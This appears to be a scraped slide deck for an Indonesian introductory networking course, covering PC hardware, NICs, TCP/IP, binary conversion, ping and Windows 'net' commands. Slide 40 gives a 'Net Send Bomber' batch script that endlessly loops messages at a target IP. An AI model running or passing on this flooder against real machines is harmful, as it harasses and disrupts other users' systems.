Download presentation
Presentation is loading. Please wait.
Published byTheresa Worl Modified over 9 years ago
1
Module 1 Introduction to Networking Andrew Fiade
2
Objectives
3
Requirements for Internet Connection
4
PC Basic
5
PC Subsystem Transistor IC Resistor Capasitor LED PCB CD-ROM drive CPU Floppy Hardisk Microprosesor Motherboard Bus RAM ROM System Unit Expansion Slot Power Suply
6
PC Backplane Backplane NIC Video Card Audio Card Paralel Port Serial Port Mouse Port USB Port
7
Idealized Computer
8
Microprosesor
9
Floppy
10
Motherboard
11
Expantion Slot AGP Expansion Slot PCI Expansion Slots
12
Network Interface Card
13
Selection NIC Protocols Type of Media Type of system Bus
14
Network Interface Cards
15
NIC and Modem Installation
16
Situations that require NIC installation Installation of a NIC on a PC that does not already have one Replacement of a malfunctioning or damaged NIC Upgrade from a 10-Mbps NIC to a 10/100/1000-Mbps NIC Change to a different type of NIC, such as wireless Installation of a secondary, or backup, NIC for network security reasons
17
NIC and Modem
18
High-Speed and Dialup Connectivity
19
TCP/IP Description and Configuration
20
Testing Connectivity with Ping
21
Web Browser and Plug-Ins
22
Troubleshooting Internet Connections
23
Network Math
24
Binary Number System
25
Bits and Bytes
26
Base 10 Numbers
27
Base 2 (Binary) Numbers
28
Converting Decimal numbers to 8-bit Binary Numbers
29
Converting 8-bit Binary Numbers to Decimal Numbers
30
Four-Octet Dotted-decimal Representation of 32-Bit Binary Numbers
31
Hexadecimal
32
Boolean or Binary Logic
33
IP Addresses and Network Masks
34
Summary
35
Praktikum : Test Konfigurasi Jaringan Ping 127.0.0.1, atau ping loopback contoh C:\Ping 127.0.0.1 Reply from 127.0.0.1 : bytes = 32 time <1 ms TTL =128 Atau C:\Ping loopback Reply from 127.0.0.1 : bytes = 32 time <1 ms TTL =128
36
Check Configuration
37
Net Send Net send Digunakan untuk mengirimkan pesan ke computer lain, contohnya adalah C:\net send [namakomputer/alamat ip address] [ pesan anda] Contoh : Mengirimkan pesan ke alamat 192.168.0.1, baris perintahnya adalah : C:\ net send 192.168.0.1 alo ini saya bagaimana kabarmu
38
Net send Masih seperti baris diatas kali ini adalah mengirimkan ke semua computer yang terkoneksi. baris perintahnya adalah : C:\net send * semuanya pa kabar nie Net View Digunakan untuk melihat list ( daftar ) jaringan yang terhubung dengan computer yang anda gunakan, computer yang terhubung adalah masih dalam satu workgroup (kelompok ) dengan computer yang anda gunakan.
39
Net Start Jika net send tidak aktif, maka menggunakan perintah “c:\net start messenger” untuk menonaktifkannya dapat menggunkaan perintah “c:\net stop messenger”.
40
Kode Program Net Send Bomber Buka Notepad dan tulis kode program dibawah Ini @echo IP target : %1 @echo Net Send Bomber siap melakukan serangan... @pause :serang @net send %1 Hooiiiii %1 i was here !!!!!! @goto serang Simpan dengan nama “serang.bat” Untuk menjalankan “c:\serang 192.168.1.1 test” Hasilnya looping netsend yang tiada henti
41
SEKIAN & TERIMA KASIH
Similar presentations
© 2025 SlidePlayer.com. Inc.
All rights reserved.